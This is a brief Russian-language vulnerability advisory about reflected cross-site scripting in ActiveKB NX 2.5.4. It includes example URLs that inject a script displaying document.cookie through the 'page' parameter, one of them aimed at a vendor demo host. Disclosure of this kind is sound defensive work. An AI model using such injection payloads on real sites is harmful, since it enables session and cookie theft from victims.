Программа: ActiveKB NX 2.5.4

Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.

Пример:

http://www.target.com/activekb/ActiveKB/?page=[XXS]

http://www.interspire.com/activekb/demo/default/categories/ActiveKB/ ?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии